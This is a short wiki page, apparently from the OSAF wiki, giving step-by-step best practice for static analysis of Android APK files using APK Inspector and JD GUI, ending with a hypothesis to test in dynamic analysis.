Loading...
 

Best Practice: Static Analysis

Best Practice: Static Analysis


This section refers heavily to other OSAF Wiki pages.


  1. Obtain APK file
  2. Refer to Best Practice: Organization to set up the folder for analysis
  3. Convert the APK file. See Conversion of Relevant Android Files for more information
  4. Open the APK file via APK Inspector. See APK Inspector for more information
  5. Using the information found from APK Inspector, use JD GUI to open the JAR file
    1. Use permissions found via APK Inspector and look for these in the java code
    2. Look at the methods in the java code. What is each method doing?
    3. From the java code, does it look like the data is being stored on the phone? Sent somewhere else?
    4. Is the application converting data into an array through the java code?
  6. Create a hypothesis on what you believe the application is doing. This will be used for the dynamic portion of analysis